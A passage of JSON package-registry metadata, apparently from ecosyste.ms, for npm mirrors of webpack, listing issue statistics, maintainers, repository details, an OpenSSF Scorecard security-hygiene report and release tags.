_closed_count":8841,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834382995473332,"avg_comments_per_pull_request":3.1543788621350948,"merged_pull_requests_count":5983,"bot_issues_count":8,"bot_pull_requests_count":2907,"past_year_issues_count":80,"past_year_pull_requests_count":896,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":359731.32045779686,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":699,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.3625,"past_year_avg_comments_per_pull_request":4.657366071428571,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":136,"past_year_merged_pull_requests_count":550,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1051,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":122,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":411,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":81,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@aleen42%2Fwebpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@aleen42%2Fwebpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@aleen42%2Fwebpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@aleen42%2Fwebpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@aleen42%2Fwebpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@aleen42%2Fwebpack/codemeta","maintainers":[{"uuid":"aleen42","login":"aleen42","name":null,"email":"aleen42@vip.qq.com","url":null,"packages_count":67,"html_url":"https://www.npmjs.com/~aleen42","role":null,"created_at":"2022-11-08T18:11:07.979Z","updated_at":"2022-11-08T18:11:07.979Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/aleen42/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":2567464,"name":"webpack-ie8","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2016-11-14T05:38:31.518Z","latest_release_published_at":"2016-11-14T05:38:31.518Z","latest_release_number":"2.1.0-beta.26","last_synced_at":"2026-09-03T00:21:28.975Z","created_at":"2022-04-10T03:38:21.412Z","updated_at":"2026-09-03T00:21:28.975Z","registry_url":"https://www.npmjs.com/package/webpack-ie8","install_command":"npm install webpack-ie8","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"2.1.0-beta.26"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%